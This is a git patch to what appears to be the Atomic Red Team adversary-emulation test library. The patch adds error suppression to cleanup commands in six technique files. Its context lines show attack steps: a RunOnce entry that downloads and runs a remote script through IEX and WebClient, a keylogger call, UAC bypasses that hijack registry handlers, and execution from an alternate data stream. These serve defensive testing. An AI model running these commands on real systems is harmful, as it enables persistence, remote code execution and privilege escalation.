From 52b99cd65431b1bda6bc5345ce19deb99c16e5e9 Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Fri, 28 Feb 2020 13:47:42 -0600
Subject: [PATCH] T1056_T1090_CleanupErrors (#844)

---
 atomics/T1056/T1056.yaml | 2 +-
 atomics/T1060/T1060.yaml | 2 +-
 atomics/T1074/T1074.yaml | 2 +-
 atomics/T1084/T1084.yaml | 2 +-
 atomics/T1086/T1086.yaml | 2 +-
 atomics/T1088/T1088.yaml | 4 ++--
 6 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/atomics/T1056/T1056.yaml b/atomics/T1056/T1056.yaml
index bf95a46e..2fcd2d96 100644
--- a/atomics/T1056/T1056.yaml
+++ b/atomics/T1056/T1056.yaml
@@ -22,4 +22,4 @@ atomic_tests:
       Set-Location $PathToAtomicsFolder
       .\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
     cleanup_command: |
-      Remove-Item $env:TEMP\key.log
+      Remove-Item $env:TEMP\key.log -ErrorAction Ignore
diff --git a/atomics/T1060/T1060.yaml b/atomics/T1060/T1060.yaml
index ea7fc8c5..3c740b16 100644
--- a/atomics/T1060/T1060.yaml
+++ b/atomics/T1060/T1060.yaml
@@ -53,4 +53,4 @@ atomic_tests:
       $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
       set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
     cleanup_command: |
-      Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
+      Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force -ErrorAction Ignore
diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml
index f91a7186..a5e34f3c 100644
--- a/atomics/T1074/T1074.yaml
+++ b/atomics/T1074/T1074.yaml
@@ -40,4 +40,4 @@ atomic_tests:
     command: |
       Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
     cleanup_command: |
-      Remove-Item -Path $env:TEMP\Folder_to_zip.zip
+      Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
diff --git a/atomics/T1084/T1084.yaml b/atomics/T1084/T1084.yaml
index 3786517a..f87cf9cd 100644
--- a/atomics/T1084/T1084.yaml
+++ b/atomics/T1084/T1084.yaml
@@ -40,7 +40,7 @@ atomic_tests:
     cleanup_command: |
       $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
       $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
-      $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
+      $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
 
       $FilterConsumerBindingToCleanup | Remove-WmiObject
       $EventConsumerToCleanup | Remove-WmiObject
diff --git a/atomics/T1086/T1086.yaml b/atomics/T1086/T1086.yaml
index 4016baca..9cbc16f6 100644
--- a/atomics/T1086/T1086.yaml
+++ b/atomics/T1086/T1086.yaml
@@ -245,4 +245,4 @@ atomic_tests:
       $streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
       Invoke-Expression $streamcommand
     cleanup_command: |
-      Remove:Item #{ads_file}
+      Remove-Item #{ads_file} -Force -ErrorAction Ignore
diff --git a/atomics/T1088/T1088.yaml b/atomics/T1088/T1088.yaml
index a23156ba..29ed6ccb 100644
--- a/atomics/T1088/T1088.yaml
+++ b/atomics/T1088/T1088.yaml
@@ -44,7 +44,7 @@ atomic_tests:
       Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
       Start-Process "C:\Windows\System32\eventvwr.msc"
     cleanup_command: |
-      Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
+      Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore
 
 - name: Bypass UAC using Fodhelper
   description: |
@@ -115,7 +115,7 @@ atomic_tests:
       Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
       Start-Process "C:\Windows\System32\ComputerDefaults.exe"
     cleanup_command: |
-      Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse
+      Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
 
 - name: Bypass UAC by Mocking Trusted Directories
   description: |